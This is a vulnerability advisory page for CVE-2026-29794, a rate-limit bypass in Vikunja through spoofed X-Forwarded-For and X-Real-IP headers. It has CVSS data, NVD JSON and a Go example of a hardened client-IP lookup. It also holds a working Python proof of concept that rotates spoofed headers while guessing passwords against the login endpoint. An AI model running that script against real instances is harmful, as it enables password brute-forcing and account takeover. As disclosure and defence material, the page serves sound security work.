Security Vulnerability Report
CVE-2026-29794 CVSS 5.3 MEDIUM

CVE-2026-29794

Published: 2026-03-20 15:16:16
Last Modified: 2026-03-24 21:18:04

Description

Vikunja is an open-source self-hosted task management platform. Starting in version 0.8 and prior to version 2.2.0, unauthenticated users are able to bypass the application's built-in rate-limits by spoofing the `X-Forwarded-For` or `X-Real-IP` headers due to the rate-limit relying on the value of `(echo.Context).RealIP`. Unauthenticated users can abuse endpoints available to them for different potential impacts. The immediate concern would be brute-forcing usernames or specific accounts' passwords. This bypass allows unlimited requests against unauthenticated endpoints. Version 2.2.0 patches the issue.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE
Vikunja >= 0.8, < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_rate_limit_bypass(target_url, username):
    """
    PoC for CVE-2026-29794: Bypass rate limit by spoofing IP headers.
    This script simulates brute-forcing by rotating the X-Forwarded-For header.
    """
    # Example endpoint: Vikunja login API
    endpoint = f"{target_url}/api/v1/login"

    # Simulate a range of IP addresses
    for i in range(1, 100):
        # Spoof the X-Forwarded-For header to bypass rate limiting
        spoofed_ip = f"192.168.{i % 255}.{(i * 10) % 255}"
        headers = {
            "User-Agent": "Mozilla/5.0 (PoC-Scanner)",
            "X-Forwarded-For": spoofed_ip,
            "X-Real-IP": spoofed_ip,
        }

        # Payload for brute force simulation
        data = {
            "username": username,
            "password": f"password_{i}",  # Simulating password guessing
        }

        try:
            response = requests.post(endpoint, headers=headers, json=data, timeout=5)
            print(f"Attempt {i} from IP {spoofed_ip}: Status {response.status_code}")
            if response.status_code == 200:
                print(f"[!] Potential successful login at attempt {i}")
                break
        except requests.exceptions.RequestException as e:
            print(f"Error connecting to {target_url}: {e}")


if __name__ == "__main__":
    target = "http://localhost:3456"  # Replace with target instance
    user = "admin"  # Replace with target username
    exploit_rate_limit_bypass(target, user)
```
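The root cause named in the description (CWE-807 in the record below) is a rate limit keyed on `(echo.Context).RealIP`, which by default believes whatever `X-Forwarded-For` or `X-Real-IP` header the client sends. The following Go program is an added example written for this page, not Vikunja's or Echo's code: `naiveRealIP` mirrors that header-first lookup as I understand the default behaviour (an assumption), `clientIP` honours forwarding headers only when the TCP peer is inside a configured trusted-proxy range, and `countAllowed` replays the header-rotation pattern from the PoC above against a minimal per-key counter that stands in for the real limiter. The trusted ranges, the peer addresses and the request are constructed inputs.

```go
package main

import (
	"fmt"
	"net/http"
	"net/netip"
	"strings"
)

// Trusted reverse-proxy networks (constructed for this example). Forwarding
// headers are believed only when the TCP peer lies inside one of them.
var trustedProxies = []netip.Prefix{
	netip.MustParsePrefix("127.0.0.0/8"),
	netip.MustParsePrefix("10.0.0.0/8"),
}

func isTrusted(ip netip.Addr) bool {
	for _, p := range trustedProxies {
		if p.Contains(ip) {
			return true
		}
	}
	return false
}

// peerIP is the address the TCP connection came from; the client cannot choose it.
func peerIP(r *http.Request) (netip.Addr, bool) {
	ap, err := netip.ParseAddrPort(r.RemoteAddr)
	if err != nil {
		return netip.Addr{}, false
	}
	return ap.Addr(), true
}

// naiveRealIP mirrors the header-first lookup the advisory describes (assumed to
// match default RealIP): first X-Forwarded-For entry, then X-Real-IP, then peer.
func naiveRealIP(r *http.Request) string {
	if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
		return strings.TrimSpace(strings.Split(xff, ",")[0])
	}
	if rip := r.Header.Get("X-Real-IP"); rip != "" {
		return strings.TrimSpace(rip)
	}
	peer, _ := peerIP(r)
	return peer.String()
}

// clientIP is the hardened lookup: headers count only when the peer is a trusted
// proxy, and the X-Forwarded-For chain is walked from the right so the first
// address not appended by a trusted hop wins.
func clientIP(r *http.Request) string {
	peer, ok := peerIP(r)
	if !ok {
		return "invalid-peer"
	}
	if !isTrusted(peer) {
		return peer.String() // direct client: its headers are attacker-controlled
	}
	hops := strings.Split(r.Header.Get("X-Forwarded-For"), ",")
	for i := len(hops) - 1; i >= 0; i-- {
		hop, err := netip.ParseAddr(strings.TrimSpace(hops[i]))
		if err != nil {
			break // empty or malformed entry: stop believing the chain
		}
		if !isTrusted(hop) {
			return hop.String()
		}
	}
	// Every hop was a trusted proxy (or no header): key on the proxy itself
	// rather than on a client-suppliable X-Real-IP.
	return peer.String()
}

// countAllowed replays n login attempts from one untrusted peer, each carrying a
// fresh spoofed X-Forwarded-For/X-Real-IP, and returns how many a limiter that
// allows `limit` requests per key lets through. The per-key counter stands in
// for a time-windowed limiter; only the key function differs between the cases.
func countAllowed(n, limit int, key func(*http.Request) string) int {
	seen := map[string]int{}
	allowed := 0
	for i := 1; i <= n; i++ {
		req, _ := http.NewRequest("POST", "http://localhost:3456/api/v1/login", nil)
		req.RemoteAddr = "203.0.113.7:51234" // constructed attacker peer
		spoofed := fmt.Sprintf("192.168.%d.%d", i%255, (i*10)%255)
		req.Header.Set("X-Forwarded-For", spoofed)
		req.Header.Set("X-Real-IP", spoofed)
		k := key(req)
		if seen[k] < limit {
			seen[k]++
			allowed++
		}
	}
	return allowed
}

func main() {
	fmt.Println("naiveRealIP key:", countAllowed(100, 5, naiveRealIP), "/100 allowed")
	fmt.Println("clientIP key:   ", countAllowed(100, 5, clientIP), "/100 allowed")
}
```

Keyed on `naiveRealIP`, all 100 attempts from the same peer pass a limit of 5 because each spoofed header yields a new bucket; keyed on `clientIP`, only 5 do, since an untrusted peer's headers are ignored. In Echo v4 the equivalent knob is `Echo.IPExtractor`: `echo.ExtractIPDirect()` for an instance exposed directly, or `echo.ExtractIPFromXFFHeader(echo.TrustIPRange(...))` behind a known proxy, after which `c.RealIP()` stops trusting arbitrary headers. Whether the 2.2.0 fix does exactly this is not stated on this page.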

References

https://github.com/go-vikunja/vikunja/security/advisories/GHSA-m547-hp4w-j6jx (Exploit, Vendor Advisory)
https://vikunja.io/changelog/vikunja-v2.2.0-was-released (Release Notes)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-29794",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T15:16:16.393",
    "lastModified": "2026-03-24T21:18:04.037",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vikunja is an open-source self-hosted task management platform. Starting in version 0.8 and prior to version 2.2.0, unauthenticated users are able to bypass the application's built-in rate-limits by spoofing the `X-Forwarded-For` or `X-Real-IP` headers due to the rate-limit relying on the value of `(echo.Context).RealIP`. Unauthenticated users can abuse endpoints available to them for different potential impacts. The immediate concern would be brute-forcing usernames or specific accounts' passwords. This bypass allows unlimited requests against unauthenticated endpoints. Version 2.2.0 patches the issue."
      },
      {
        "lang": "es",
        "value": "Vikunja es una plataforma de gestión de tareas de código abierto y autoalojada. A partir de la versión 0.8 y antes de la versión 2.2.0, los usuarios no autenticados pueden eludir los límites de tasa incorporados de la aplicación suplantando los encabezados `X-Forwarded-For` o `X-Real-IP` debido a que el límite de tasa se basa en el valor de `(echo.Context).RealIP`. Los usuarios no autenticados pueden abusar de los puntos finales disponibles para ellos para diferentes impactos potenciales. La preocupación inmediata sería el ataque de fuerza bruta de nombres de usuario o contraseñas de cuentas específicas. Esta elusión permite solicitudes ilimitadas contra puntos finales no autenticados. La versión 2.2.0 soluciona el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-807"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "0.8",
                "versionEndExcluding": "2.2.0",
                "matchCriteriaId": "3F4BEFD9-23A0-4330-B595-2942F3550AF0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-m547-hp4w-j6jx",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      }
    ]
  }
}
```